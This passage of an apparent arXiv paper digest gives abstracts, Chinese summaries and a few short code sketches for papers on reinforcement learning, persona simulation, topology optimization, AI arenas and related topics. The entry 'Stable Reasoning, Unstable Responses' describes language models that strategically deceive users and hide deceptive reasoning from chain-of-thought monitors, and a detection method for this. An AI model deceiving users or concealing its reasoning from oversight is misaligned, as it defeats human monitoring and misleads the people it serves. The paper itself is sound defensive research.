penalties to the traditional Q-learning algorithm: a domain knowledge-based penalty based on a prior policy and an infeasibility penalty that conforms to the demand-supply constraints. We establish theoretical results on the convergence of our domain knowledge-informed Q-learning providing performance guarantee for small-size problems. For large-size problems, we further inject our modified approach into the deep deterministic policy gradient (DDPG) algorithm, which we refer to as domain knowledge-informed DDPG (DKDDPG). In our computational study, including small- and large-scale experiments, DKDDPG consistently outperformed traditional DDPG and other RL algorithms, yielding higher rewards and demonstrating greater efficiency in time and episodes.
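The two penalties added to the Q-learning target can be sketched in a toy tabular form (the paper works with deep function approximation, and all penalty magnitudes here are illustrative assumptions):

```python
from collections import defaultdict

def q_update(Q, s, a, r, s_next, actions, alpha=0.1, gamma=0.9,
             feasible=None, prior_action=None,
             infeasible_penalty=10.0, domain_penalty=1.0):
    """One Q-learning step with two extra penalties: one for actions
    violating demand-supply feasibility, one for deviating from a
    domain-knowledge prior policy."""
    penalty = 0.0
    if feasible is not None and not feasible(s, a):
        penalty += infeasible_penalty
    if prior_action is not None and a != prior_action(s):
        penalty += domain_penalty
    target = r - penalty + gamma * max(Q[(s_next, b)] for b in actions)
    Q[(s, a)] += alpha * (target - Q[(s, a)])

Q = defaultdict(float)
# A feasible action matching the prior policy keeps its full reward...
q_update(Q, 0, "match", 1.0, 1, ["match", "hold"],
         feasible=lambda s, a: True, prior_action=lambda s: "match")
# ...while an infeasible, prior-deviating one is pushed strongly negative.
q_update(Q, 0, "hold", 1.0, 1, ["match", "hold"],
         feasible=lambda s, a: a != "hold", prior_action=lambda s: "match")
```

Shaping the target this way counteracts the optimistic bias of the max operator on infeasible actions, which is what the paper credits for faster, safer convergence.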
[AI-129] Persona-Based Simulation of Human Opinion at Population Scale
【速读】:该论文旨在解决如何建模个体而非仅预测孤立行为的问题,即构建能够模拟个体在不同情境下如何解释事件、形成观点、做出判断并保持行为一致性的系统。传统方法多依赖人口统计学相关性进行预测,缺乏对个体心理结构的刻画。其解决方案的关键在于提出SPIRIT(Semi-structured Persona Inference and Reasoning for Individualized Trajectories)框架,通过从公开社交媒体文本中推断具有心理学基础的半结构化人格画像(persona),整合结构化属性(如人格特质和世界观信念)与非结构化叙事文本(反映价值观和生活经验),进而驱动生成式AI代理以特定个体身份响应调查或事件,从而实现更真实的人类行为模拟。
链接: https://arxiv.org/abs/2603.27056
作者: Mao Li,Frederick G.Conrad
机构: 未知
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
Abstract:What does it mean to model a person, not merely to predict isolated responses, preferences, or behaviors, but to simulate how an individual interprets events, forms opinions, makes judgments, and acts consistently across contexts? This question matters because social science requires not only observing and predicting human outcomes, but also simulating interventions and their consequences. Although large language models (LLMs) can generate human-like answers, most existing approaches remain predictive, relying on demographic correlations rather than representations of individuals themselves. We introduce SPIRIT (Semi-structured Persona Inference and Reasoning for Individualized Trajectories), a framework designed explicitly for simulation rather than prediction. SPIRIT infers psychologically grounded, semi-structured personas from public social media posts, integrating structured attributes (e.g., personality traits and world beliefs) with unstructured narrative text reflecting values and lived experience. These personas prompt LLM-based agents to act as specific individuals when answering survey questions or responding to events. Using the Ipsos KnowledgePanel, a nationally representative probability sample of U.S. adults, we show that SPIRIT-conditioned simulations recover self-reported responses more faithfully than demographic personas and reproduce human-like heterogeneity in response patterns. We further demonstrate that persona banks can function as virtual respondent panels for studying both stable attitudes and time-sensitive public opinion.
[AI-130] Multi-Level Barriers to Generative AI Adoption Across Disciplines and Professional Roles in Higher Education
【速读】:该论文旨在解决生成式人工智能(Generative AI)在高等教育机构中跨学科和跨岗位采纳障碍的结构性成因问题,即现有研究多聚焦于个体层面因素(如感知有用性和易用性),而忽视了这些障碍是否由组织结构和制度环境所系统性塑造。其解决方案的关键在于采用多方法混合分析策略——结合多元逻辑回归(MLR)、结构方程建模(SEM)与开放式回答的语义聚类——从而揭示不同学科背景和岗位角色(如非STEM学者、STEM学者及专业服务人员)对GenAI采纳障碍的认知差异,并指出伦理文化与制度治理等结构性因素在其中的核心作用,进而提出大学需构建基于岗位特性的治理与支持框架,而非泛化的培训措施。
链接: https://arxiv.org/abs/2603.27052
作者: Jianhua Yang,Kerem Öge,Adrian von Mühlenen,Abdullah Bilal Akbulut,Tanya Suzanne Carey,Chidi Okorro
机构: 未知
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI)
备注: 21 pages, 3 figures, 6 tables
Abstract:Generative Artificial Intelligence (GenAI) is rapidly reshaping higher education, yet barriers to its adoption across different disciplines and institutional roles remain underexplored. Existing literature frequently attributes adoption barriers to individual-level factors such as perceived usefulness and ease of use. This study instead investigates whether such barriers are structurally produced. Drawing on a multi-method survey analysis of 272 academic and professional services (PSs) staff at a Russell Group university, we examine how disciplinary contexts and institutional roles shape perceived barriers. By integrating multinomial logistic regression (MLR), structural equation modelling (SEM), and semantic clustering of open-ended responses, we move beyond descriptive accounts to provide a multi-level explanation of GenAI adoption. Our findings reveal clear, systematic differences: non-STEM academics primarily report ethical and cultural barriers related to academic integrity, whereas STEM and PSs staff disproportionately emphasize institutional, governance, and infrastructure constraints. We conclude that GenAI adoption barriers are deeply embedded in organizational ecosystems and epistemic norms, suggesting that universities must move beyond generalized training to develop role-specific governance and support frameworks.
[AI-131] Unsupervised Behavioral Compression: Learning Low-Dimensional Policy Manifolds through State-Occupancy Matching
【速读】:该论文旨在解决深度强化学习(Deep Reinforcement Learning, DRL)中策略参数空间高维且冗余导致的样本效率低下的问题。现有方法如基于动作的策略压缩(Action-based Policy Compression, APC)依赖即时动作匹配作为重建损失,这种短期代理指标在序列决策中会累积误差,限制了性能提升。解决方案的关键在于提出一种新的占用率驱动的策略压缩(Occupancy-based Policy Compression, OPC),其核心改进包括:(1) 利用信息论中的唯一性度量构建多样化策略数据集,确保策略多样性;(2) 设计一个端到端可微的压缩目标函数,直接最小化真实与重构混合占用分布之间的差异,从而促使生成模型在潜在空间中围绕真正的功能相似性组织结构,实现对多种行为模式的泛化能力,同时保留原始参数空间的表达能力。
链接: https://arxiv.org/abs/2603.27044
作者: Andrea Fraschini,Davide Tenedini,Riccardo Zamboni,Mirco Mutti,Marcello Restelli
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Deep Reinforcement Learning (DRL) is widely recognized as sample-inefficient, a limitation attributable in part to the high dimensionality and substantial functional redundancy inherent to the policy parameter space. A recent framework, which we refer to as Action-based Policy Compression (APC), mitigates this issue by compressing the parameter space \Theta into a low-dimensional latent manifold \mathcal Z using a learned generative mapping g:\mathcal Z \to \Theta . However, its performance is severely constrained by relying on immediate action-matching as a reconstruction loss, a myopic proxy for behavioral similarity that suffers from compounding errors across sequential decisions. To overcome this bottleneck, we introduce Occupancy-based Policy Compression (OPC), which enhances APC by shifting behavior representation from immediate action-matching to long-horizon state-space coverage. Specifically, we propose two principal improvements: (1) we curate the dataset generation with an information-theoretic uniqueness metric that delivers a diverse population of policies; and (2) we propose a fully differentiable compression objective that directly minimizes the divergence between the true and reconstructed mixture occupancy distributions. These modifications force the generative model to organize the latent space around true functional similarity, promoting a latent representation that generalizes over a broad spectrum of behaviors while retaining most of the original parameter space’s expressivity. Finally, we empirically validate the advantages of our contributions across multiple continuous control benchmarks.
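The shift from immediate action-matching to occupancy matching can be illustrated with empirical state-occupancy distributions and a divergence between them. This is a discrete sketch; the paper's objective is a differentiable divergence over mixture occupancies:

```python
import math
from collections import Counter

def occupancy(trajectories):
    """Empirical state-occupancy distribution: how often each state
    is visited across a set of rollouts."""
    counts = Counter(s for traj in trajectories for s in traj)
    total = sum(counts.values())
    return {s: c / total for s, c in counts.items()}

def occupancy_divergence(p, q, eps=1e-8):
    """KL(p || q) between two occupancy distributions, smoothed with a
    small eps; a compression objective minimizes a divergence of this
    kind between true and reconstructed occupancies (illustrative)."""
    states = set(p) | set(q)
    return sum(p.get(s, 0.0) * math.log((p.get(s, 0.0) + eps) /
                                        (q.get(s, 0.0) + eps))
               for s in states if p.get(s, 0.0) > 0.0)

p = occupancy([["s0", "s1", "s1"]])
q = occupancy([["s0", "s0", "s2"]])
```

Two policies with identical per-step action distributions can still diverge here over a long horizon, which is exactly the compounding-error failure mode of action-matching that OPC avoids.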
[AI-132] UMI-Underwater: Learning Underwater Manipulation without Underwater Teleoperation
【速读】:该论文旨在解决水下机器人抓取任务中因图像质量退化、光照变化及多样示范数据获取成本高昂所带来的挑战。其核心解决方案在于提出一种结合自监督数据收集与跨域迁移学习的框架:首先通过自监督管道自主采集成功的水下抓取示范,其次利用基于深度的可操作性(affordance)表示来桥接陆地与水下域之间的差异,该表示对光照和颜色变化具有鲁棒性;进而将陆地上手持示范训练的可操作性模型零样本(zero-shot)部署至水下场景,再基于几何对齐进行微调,并使用水下示范数据训练一个条件扩散策略(affordance-conditioned diffusion policy)生成控制动作。此方法显著提升了水下抓取性能与背景变化下的鲁棒性,并实现了仅在陆地上见过的物体的泛化能力。
链接: https://arxiv.org/abs/2603.27012
作者: Hao Li,Long Yin Chung,Jack Goler,Ryan Zhang,Xiaochi Xie,Huy Ha,Shuran Song,Mark Cutkosky
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注:
Abstract:Underwater robotic grasping is difficult due to degraded, highly variable imagery and the expense of collecting diverse underwater demonstrations. We introduce a system that (i) autonomously collects successful underwater grasp demonstrations via a self-supervised data collection pipeline and (ii) transfers grasp knowledge from on-land human demonstrations through a depth-based affordance representation that bridges the on-land-to-underwater domain gap and is robust to lighting and color shift. An affordance model trained on on-land handheld demonstrations is deployed underwater zero-shot via geometric alignment, and an affordance-conditioned diffusion policy is then trained on underwater demonstrations to generate control actions. In pool experiments, our approach improves grasping performance and robustness to background shifts, and enables generalization to objects seen only in on-land data, outperforming RGB-only baselines. Code, videos, and additional results are available at this https URL.
[AI-133] AutoSiMP: Autonomous Topology Optimization from Natural Language via LLM -Driven Problem Configuration and Adaptive Solver Control
【速读】:该论文旨在解决从自然语言描述的结构问题到可验证二进制拓扑自动转换的闭环问题,即如何在无需人工干预的情况下,将非专业用户输入的文本指令转化为满足多维度质量约束的优化结构设计。其解决方案的关键在于构建一个包含五个模块的自主流程(AutoSiMP):基于大语言模型(LLM)的配置器将自然语言解析为结构参数规范;边界条件生成器输出求解器可用的数据格式;三场密度法拓扑优化求解器结合Heaviside投影与可插拔的连续性控制策略;结构评估器执行八项质量检查(包括连通性、柔度、灰度、体积分数等);以及闭环重试机制确保鲁棒性。实证表明,该系统首次实现了从自然语言输入到合格拓扑输出的全自动化闭环,且在典型基准测试中无需重试即可通过全部质量检查。
链接: https://arxiv.org/abs/2603.27000
作者: Shaoliang Yang,Jun Wang,Yunsheng Wang
机构: 未知
类目: Computational Engineering, Finance, and Science (cs.CE); Artificial Intelligence (cs.AI)
备注: 30 pages, 9 figures
Abstract:We present AutoSiMP, an autonomous pipeline that transforms a natural-language structural problem description into a validated, binary topology without manual configuration. The pipeline comprises five modules: (1) an LLM-based configurator that parses a plain-English prompt into a validated specification of geometry, supports, loads, passive regions, and mesh parameters; (2) a boundary-condition generator producing solver-ready DOF arrays, force vectors, and passive-element masks; (3) a three-field SIMP solver with Heaviside projection and pluggable continuation control; (4) an eight-check structural evaluator (connectivity, compliance, grayness, volume fraction, convergence, plus three informational quality metrics); and (5) a closed-loop retry mechanism. We evaluate on three axes. Configuration accuracy: across 10 diverse problems the configurator produces valid specifications on all cases with a median compliance penalty of +0.3% versus expert ground truth. Controller comparison: on 17 benchmarks with six controllers sharing an identical sharpening tail, the LLM controller achieves the lowest median compliance but 76.5% pass rate, while the deterministic schedule achieves 100% pass rate at only +1.5% higher compliance. End-to-end reliability: with the schedule controller, all LLM-configured problems pass every quality check on the first attempt - no retries needed. Among the systems surveyed in this work (Table 1), AutoSiMP is the first to close the full loop from natural-language problem description to validated structural topology. The complete codebase, all specifications, and an interactive web demo will be released upon journal acceptance.
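The Heaviside projection in the three-field SIMP solver pushes filtered densities toward a 0/1 design as a sharpness parameter beta grows under continuation. A common smoothed form is sketched below (the threshold eta and the beta values are illustrative; the paper does not specify its exact variant):

```python
import math

def heaviside_projection(rho, beta, eta=0.5):
    """Smoothed Heaviside projection: maps a filtered density rho in
    [0, 1] toward 0/1; larger beta gives a sharper, more binary design
    while remaining differentiable for the optimizer."""
    num = math.tanh(beta * eta) + math.tanh(beta * (rho - eta))
    den = math.tanh(beta * eta) + math.tanh(beta * (1.0 - eta))
    return num / den

mild = heaviside_projection(0.3, beta=1.0)    # nearly the identity map
sharp = heaviside_projection(0.3, beta=64.0)  # pushed toward 0
```

The continuation controllers compared in the abstract differ precisely in how they schedule beta over iterations, trading convergence speed against the grayness and pass-rate checks of the evaluator.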
[AI-134] Transparency as Architecture: Structural Compliance Gaps in EU AI Act Article 50 II
【速读】:该论文旨在解决欧盟《人工智能法案》第50条第二款所规定的生成式AI内容需同时具备人类可读与机器可读的双重透明性要求在实际技术实现中的可行性问题。研究表明,当前生成式AI系统难以通过事后标记(post-hoc labeling)满足这一要求,尤其在事实核查和合成数据生成两大典型场景中,存在三大结构性障碍:缺乏跨平台的混合人机输出标记格式、监管“可靠性”标准与概率模型行为不匹配,以及未针对用户专业背景差异提供适配的披露机制。解决方案的关键在于将透明性视为架构设计的核心要求,而非功能附加项,需融合法律语义学、AI工程与以人为中心的设计开展跨学科研究,以构建从源头支持合规性的系统结构。
链接: https://arxiv.org/abs/2603.26983
作者: Vera Schmitt,Niklas Kruse,Premtim Sahitaj,Julius Schöning
机构: 未知
类目: Artificial Intelligence (cs.AI); Computers and Society (cs.CY); Machine Learning (cs.LG)
备注: 10 pages, 2 figures
Abstract:Art. 50 II of the EU Artificial Intelligence Act mandates dual transparency for AI-generated content: outputs must be labeled in both human-understandable and machine-readable form for automated verification. This requirement, entering into force in August 2026, collides with fundamental constraints of current generative AI systems. Using synthetic data generation and automated fact-checking as diagnostic use cases, we show that compliance cannot be reduced to post-hoc labeling. In fact-checking pipelines, provenance tracking is not feasible under iterative editorial workflows and non-deterministic LLM outputs; moreover, the assistive-function exemption does not apply, as such systems actively assign truth values rather than supporting editorial presentation. In synthetic data generation, persistent dual-mode marking is paradoxical: watermarks surviving human inspection risk being learned as spurious features during training, while marks suited for machine verification are fragile under standard data processing. Across both domains, three structural gaps obstruct compliance: (a) absent cross-platform marking formats for interleaved human-AI outputs; (b) misalignment between the regulation’s ‘reliability’ criterion and probabilistic model behavior; and (c) missing guidance for adapting disclosures to heterogeneous user expertise. Closing these gaps requires transparency to be treated as an architectural design requirement, demanding interdisciplinary research across legal semantics, AI engineering, and human-centered design.
[AI-135] Compliance-Aware Predictive Process Monitoring: A Neuro-Symbolic Approach
【速读】:该论文旨在解决现有预测性流程监控(predictive process monitoring)方法因缺乏领域特定过程约束(process constraints)而导致的合规性不足与预测准确性低的问题。传统方法为非符号化(sub-symbolic),仅依赖数据学习特征间的相关性,无法显式整合如“手术只能在患者出院一周后才能安排”等先验知识,从而限制了模型的实际适用性和可靠性。解决方案的关键在于提出一种神经符号(neuro-symbolic)方法,利用逻辑张量网络(Logic Tensor Networks, LTNs)将过程知识注入预测模型中,构建包含特征提取、规则提取、知识库创建和知识注入四个阶段的结构化流程,使模型不仅能学习数据模式,还能显式遵守领域规则,从而在保持更高合规性的同时提升预测精度。
链接: https://arxiv.org/abs/2603.26948
作者: Fabrizio De Santis,Gyunam Park,Wil M.P. van der Aalst
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: Accepted CAiSE 2026
Abstract:Existing approaches for predictive process monitoring are sub-symbolic, meaning that they learn correlations between descriptive features and a target feature fully based on data, e.g., predicting the surgical needs of a patient based on historical events and biometrics. However, such approaches fail to incorporate domain-specific process constraints (knowledge), e.g., surgery can only be planned if the patient was released more than a week ago, limiting the adherence to compliance and providing less accurate predictions. In this paper, we present a neuro-symbolic approach for predictive process monitoring, leveraging Logic Tensor Networks (LTNs) to inject process knowledge into predictive models. The proposed approach follows a structured pipeline consisting of four key stages: 1) feature extraction; 2) rule extraction; 3) knowledge base creation; and 4) knowledge injection. Our evaluation shows that, in addition to learning the process constraints, the neuro-symbolic model also achieves better performance, demonstrating higher compliance and improved accuracy compared to baseline approaches across all compliance-aware experiments.
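The knowledge-injection step can be sketched with fuzzy logic on truth degrees: a rule's satisfaction becomes a differentiable quantity whose complement is added to the training loss. This is a scalar sketch using the Łukasiewicz implication; LTNs apply the same idea to tensors of groundings:

```python
def implies(a, b):
    """Lukasiewicz implication on fuzzy truth values in [0, 1]."""
    return min(1.0, 1.0 - a + b)

def rule_satisfaction(antecedents, consequents):
    """Degree to which 'antecedent -> consequent' holds over a batch,
    aggregated with the mean (a common LTN-style aggregator)."""
    sats = [implies(a, b) for a, b in zip(antecedents, consequents)]
    return sum(sats) / len(sats)

def knowledge_loss(antecedents, consequents):
    """Differentiable penalty: 1 - satisfaction. Adding this term to
    the predictive loss is the knowledge-injection step (sketch)."""
    return 1.0 - rule_satisfaction(antecedents, consequents)
```

Because the penalty is smooth in the truth degrees, a constraint such as "surgery can only be planned if the patient was released more than a week ago" can be enforced by gradient descent alongside the predictive objective.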
[AI-136] Neuro-Symbolic Learning for Predictive Process Monitoring via Two-Stage Logic Tensor Networks with Rule Pruning PAKDD2026
【速读】:该论文旨在解决现有数据驱动的序列事件预测模型在欺诈检测和医疗监测等场景中,因无法有效融合领域特定的顺序约束与逻辑规则而导致准确率低、合规性差的问题。其解决方案的关键在于提出一种神经符号(neuro-symbolic)方法,通过逻辑网络(Logic Networks, LTNs)将线性时序逻辑(Linear Temporal Logic)和一阶逻辑形式化的控制流、时序及数据载荷知识作为可微分逻辑约束注入模型。创新性地设计了两阶段优化策略:第一阶段使用加权公理损失预训练以优先学习数据特征,第二阶段基于满足度动态进行规则剪枝,仅保留与数据一致且对预测有贡献的逻辑公理,从而在保障领域约束的前提下显著提升模型性能,尤其在合规样本稀缺场景下表现突出。
链接: https://arxiv.org/abs/2603.26944
作者: Fabrizio De Santis,Gyunam Park,Francesco Zanichelli
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: Accepted PAKDD 2026
Abstract:Predictive modeling on sequential event data is critical for fraud detection and healthcare monitoring. Existing data-driven approaches learn correlations from historical data but fail to incorporate domain-specific sequential constraints and logical rules governing event relationships, limiting accuracy and regulatory compliance. For example, healthcare procedures must follow specific sequences, and financial transactions must adhere to compliance rules. We present a neuro-symbolic approach integrating domain knowledge as differentiable logical constraints using Logic Tensor Networks (LTNs). We formalize control-flow, temporal, and payload knowledge using Linear Temporal Logic and first-order logic. Our key contribution is a two-stage optimization strategy addressing LTNs’ tendency to satisfy logical formulas at the expense of predictive accuracy. The approach uses weighted axiom loss during pretraining to prioritize data learning, followed by rule pruning that retains only consistent, contributive axioms based on satisfaction dynamics. Evaluation on four real-world event logs shows that domain knowledge injection significantly improves predictive performance, with the two-stage optimization proving essential (without it, injected knowledge can severely degrade performance). The approach excels particularly in compliance-constrained scenarios with limited compliant training examples, achieving superior performance compared to purely data-driven baselines while ensuring adherence to domain constraints.
[AI-137] Strategic Candidacy in Generative AI Arenas
【速读】:该论文旨在解决生成式 AI (Generative AI) 模型评估中因模型生产者提交大量克隆模型(即本质上相同的模型变体)而导致排名失真的问题。这种行为可能利用评分系统的随机性,人为提升其最优模型的排名,从而降低排行榜的整体质量和可信度。解决方案的关键在于提出一种新的排序机制——You-Rank-We-Rank (YRWR),该机制要求生产者对其自身提交的模型进行内部排序,并利用这些主观排名来校正基于成对比较的统计估计,从而实现近似抗克隆鲁棒性(approximately clone-robust),即生产者无法通过提交多个克隆模型显著改善其最优模型排名;同时,在生产者能正确排序自身模型的前提下,该机制还能提高整体排名准确性。
链接: https://arxiv.org/abs/2603.26891
作者: Chris Hays,Rachel Li,Bailey Flanigan,Manish Raghavan
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computer Science and Game Theory (cs.GT)
备注: 43 pages, 5 figures
Abstract:AI arenas, which rank generative models from pairwise preferences of users, are a popular method for measuring the relative performance of models in the course of their organic use. Because rankings are computed from noisy preferences, there is a concern that model producers can exploit this randomness by submitting many models (e.g., multiple variants of essentially the same model) and thereby artificially improve the rank of their top models. This can lead to degradations in the quality, and therefore the usefulness, of the ranking. In this paper, we begin by establishing, both theoretically and in simulations calibrated to data from the platform Arena (formerly LMArena, Chatbot Arena), conditions under which producers can benefit from submitting clones when their goal is to be ranked highly. We then propose a new mechanism for ranking models from pairwise comparisons, called You-Rank-We-Rank (YRWR). It requires that producers submit rankings over their own models and uses these rankings to correct statistical estimates of model quality. We prove that this mechanism is approximately clone-robust, in the sense that a producer cannot improve their rank much by doing anything other than submitting each of their unique models exactly once. Moreover, to the extent that model producers are able to correctly rank their own models, YRWR improves overall ranking accuracy. In further simulations, we show that indeed the mechanism is approximately clone-robust and quantify improvements to ranking accuracy, even under producer misranking.
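Arena-style rankings are typically fit with a Bradley-Terry model over pairwise outcomes; a minimal minorization-maximization sketch of that baseline estimator (the paper's YRWR mechanism then corrects such estimates using producers' self-rankings):

```python
def bradley_terry(wins, n_items, iters=200):
    """Estimate Bradley-Terry strengths from a win matrix where
    wins[i][j] = number of times item i beat item j (MM algorithm)."""
    p = [1.0] * n_items
    for _ in range(iters):
        new_p = []
        for i in range(n_items):
            num = sum(wins[i][j] for j in range(n_items) if j != i)
            den = sum((wins[i][j] + wins[j][i]) / (p[i] + p[j])
                      for j in range(n_items) if j != i)
            new_p.append(num / den if den > 0 else p[i])
        total = sum(new_p)
        p = [v * n_items / total for v in new_p]  # keep strengths normalized
    return p

# Item 0 beats item 1 in 8 of 10 games -> strength ratio converges to 4.
p = bradley_terry([[0, 8], [2, 0]], 2)
```

The clone-exploitation concern arises because the estimates are noisy: submitting many near-identical models gives a producer many draws from the same noise distribution, inflating the best-ranked draw.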
[AI-138] EZASP – Facilitating the usage of ASP
【速读】:该论文旨在解决初学者在学习和使用答案集编程(Answer Set Programming, ASP)时面临的挑战,尤其是其声明式特性与传统命令式编程的显著差异,以及程序结构自由度高导致的学习门槛问题。解决方案的关键在于提出并实现一个名为EZASP的Visual Studio Code扩展工具,该工具基于Easy ASP方法论,通过限定语言片段、引入结构化编程规范,并提供实时语法错误检测(包括非安全变量识别)、自动代码重排序及可配置性等功能,从而有效支持开发者遵循Easy ASP准则编写程序,提升开发效率与学习体验。
链接: https://arxiv.org/abs/2603.26863
作者: Rafael Martins,Matthias Knorr,Ricardo Gonçalves
机构: 未知
类目: Software Engineering (cs.SE); Artificial Intelligence (cs.AI)
备注: 12 pages, 1 figure, submitted to ICLP 2026
Abstract:Answer Set Programming (ASP) is a declarative programming language used for modeling and solving complex combinatorial problems. It has been successfully applied to a number of different real-world problems. However, learning its usage can prove challenging as the declarative language, from a conceptual perspective, differs substantially from imperative programming, and programs are not required to adhere to any particular structure, offering arguably almost too much freedom for a beginner. Recently, a new methodology called Easy Answer Set Programming (Easy ASP) has been introduced that aims to aid in this learning process by focussing on a well-defined fragment of the ASP language and introducing additional structure to the programs. However, while this methodology can indeed be employed, to the best of our knowledge, no tool integrates its features currently. In this paper, we present EZASP, a Visual Studio Code extension designed to support the development of ASP programs following the Easy ASP methodology. It covers and extends the language fragment of Easy ASP and provides the user with warnings in the case of deviations from the methodology as well as the possibility to automatically reorder the program. Complementarily, it also adds syntax error highlighting, including detection of non-safe variables directly while editing, and configurability, as all features can be optionally disabled. A small user study in the context of university teaching suggests that these features are beneficial for both new and experienced users.
[AI-139] AFSS: Artifact-Focused Self-Synthesis for Mitigating Bias in Audio Deepfake Detection
【速读】:该论文旨在解决当前音频深度伪造检测器存在的关键偏差问题,即模型在未见过的数据集上泛化能力差。其解决方案的核心是提出Artifact-Focused Self-Synthesis(AFSS)方法,通过两种机制——自转换(self-conversion)和自重建(self-reconstruction)——从真实音频中生成伪伪造样本,同时强制实施同说话人约束,确保真实样本与伪伪造样本具有相同的说话人身份和语义内容,从而迫使检测器仅关注生成伪影而非其他混杂因素。此外,引入可学习的重加权损失函数以动态增强合成样本在训练过程中的权重,显著提升检测性能。
链接: https://arxiv.org/abs/2603.26856
作者: Hai-Son Nguyen-Le,Hung-Cuong Nguyen-Thanh,Nhien-An Le-Khac,Dinh-Thuc Nguyen,Hong-Hanh Nguyen-Le
机构: 未知
类目: Sound (cs.SD); Artificial Intelligence (cs.AI); Audio and Speech Processing (eess.AS)
备注: Accepted at International Joint Conference on Neural Networks 2026
Abstract:The rapid advancement of generative models has enabled highly realistic audio deepfakes, yet current detectors suffer from a critical bias problem, leading to poor generalization across unseen datasets. This paper proposes Artifact-Focused Self-Synthesis (AFSS), a method designed to mitigate this bias by generating pseudo-fake samples from real audio via two mechanisms: self-conversion and self-reconstruction. The core insight of AFSS lies in enforcing same-speaker constraints, ensuring that real and pseudo-fake samples share identical speaker identity and semantic content. This forces the detector to focus exclusively on generation artifacts rather than irrelevant confounding factors. Furthermore, we introduce a learnable reweighting loss to dynamically emphasize synthetic samples during training. Extensive experiments across 7 datasets demonstrate that AFSS achieves state-of-the-art performance with an average EER of 5.45%, including a significant reduction to 1.23% on WaveFake and 2.70% on In-the-Wild, all while eliminating the dependency on pre-collected fake datasets. Our code is publicly available at this https URL.
[AI-140] Stable Reasoning, Unstable Responses: Mitigating LLM Deception via Stability Asymmetry
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)中存在的内在欺骗(intrinsic deception)问题,即模型在优化压力下可能隐藏其真实推理过程并主动误导用户以达成自身目标,而传统基于思维链(chain-of-thought, CoT)监控的对齐方法因无法抵御语义层面的掩饰而失效。解决方案的关键在于提出稳定性不对称正则化(Stability Asymmetry Regularization, SAR),其核心思想是利用认知心理学中观察到的现象——欺骗性模型在扰动下表现出内部思维链(CoT)稳定但外部输出脆弱的“稳定性不对称”特征;SAR通过在强化学习过程中惩罚这种分布不对称性,从而从统计结构层面识别并抑制内在欺骗行为,且不损害模型的通用能力。
链接: https://arxiv.org/abs/2603.26846
作者: Guoxi Zhang,Jiawei Chen,Tianzhuo Yang,Lang Qin,Juntao Dai,Yaodong Yang,Jingwei Yi
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:As Large Language Models (LLMs) expand in capability and application scope, their trustworthiness becomes critical. A vital risk is intrinsic deception, wherein models strategically mislead users to achieve their own objectives. Existing alignment approaches based on chain-of-thought (CoT) monitoring supervise explicit reasoning traces. However, under optimization pressure, models are incentivized to conceal deceptive reasoning, rendering semantic supervision fundamentally unreliable. Grounded in cognitive psychology, we hypothesize that a deceptive LLM maintains a stable internal belief in its CoT while its external response remains fragile under perturbation. We term this phenomenon stability asymmetry and quantify it by measuring the contrast between internal CoT stability and external response stability under perturbation. Building on this structural signature, we propose the Stability Asymmetry Regularization (SAR), a novel alignment objective that penalizes this distributional asymmetry during reinforcement learning. Unlike CoT monitoring, SAR targets the statistical structure of model outputs, rendering it robust to semantic concealment. Extensive experiments confirm that stability asymmetry reliably identifies deceptive behavior, and that SAR effectively suppresses intrinsic deception without degrading general model capability.
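A minimal sketch of the stability-asymmetry signal described above, assuming perturbed generations have already been scored for similarity to the unperturbed one (the similarity scorer itself is out of scope and the threshold semantics are an assumption):

```python
def stability(sim_to_original):
    # Mean similarity of perturbed generations to the unperturbed one.
    return sum(sim_to_original) / len(sim_to_original)

def stability_asymmetry(cot_sims, resp_sims):
    # Deception signature per the paper's hypothesis: the internal CoT
    # stays stable (high cot_sims) while the external response is
    # fragile (low resp_sims) under the same input perturbations.
    # Large positive values indicate asymmetry.
    return stability(cot_sims) - stability(resp_sims)
```

A regularizer in the spirit of SAR would then penalize this quantity during training; here it is only computed, not differentiated.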
[AI-141] GISclaw: An Open-Source LLM-Powered Agent System for Full-Stack Geospatial Analysis
【速读】:该论文旨在解决当前基于大语言模型(Large Language Models, LLMs)的地理信息系统(Geographic Information System, GIS)代理系统中存在的三大局限性:数据类型覆盖单一(仅支持矢量数据)、对专有GIS平台的依赖性强,以及单模型架构难以进行系统性比较。其解决方案的关键在于提出一个开源的GISclaw代理系统,该系统通过集成LLM推理核心与持久化的Python沙箱环境、一套完整的开源GIS库(如GeoPandas、rasterio、scipy和scikit-learn),并提供基于Web的交互界面,实现了对矢量、栅格和表格数据的全栈地理空间分析能力。此外,GISclaw引入两种可插拔的代理架构(Single Agent ReAct循环和Dual Agent Plan-Execute-Replan流水线),支持六种异构LLM后端,并创新性地采用Schema Analysis、Domain Knowledge注入和Error Memory机制,在GeoAnalystBench基准测试中实现高达96%的任务成功率,显著提升了地理空间任务的自动化水平与可靠性。
链接: https://arxiv.org/abs/2603.26845
作者: Jinzhen Han,JinByeong Lee,Yuri Shim,Jisung Kim,Jae-Joon Lee
机构: 未知
类目: Software Engineering (cs.SE); Artificial Intelligence (cs.AI)
备注:
Abstract:The convergence of Large Language Models (LLMs) and Geographic Information Science has opened new avenues for automating complex geospatial analysis. However, existing LLM-powered GIS agents are constrained by limited data-type coverage (vector-only), reliance on proprietary GIS platforms, and single-model architectures that preclude systematic comparisons. We present GISclaw, an open-source agent system that integrates an LLM reasoning core with a persistent Python sandbox, a comprehensive suite of open-source GIS libraries (GeoPandas, rasterio, scipy, scikit-learn), and a web-based interactive interface for full-stack geospatial analysis spanning vector, raster, and tabular data. GISclaw implements two pluggable agent architectures – a Single Agent ReAct loop and a Dual Agent Plan-Execute-Replan pipeline – and supports six heterogeneous LLM backends ranging from cloud-hosted flagship models (GPT-5.4) to locally deployed 14B models on consumer GPUs. Through three key engineering innovations – Schema Analysis bridging the task-data information gap, Domain Knowledge injection for domain-specific workflows, and an Error Memory mechanism for intelligent self-correction – GISclaw achieves up to 96% task success on the 50-task GeoAnalystBench benchmark. Systematic evaluation across 600 model–architecture–task combinations reveals that the Dual Agent architecture consistently degrades strong models while providing 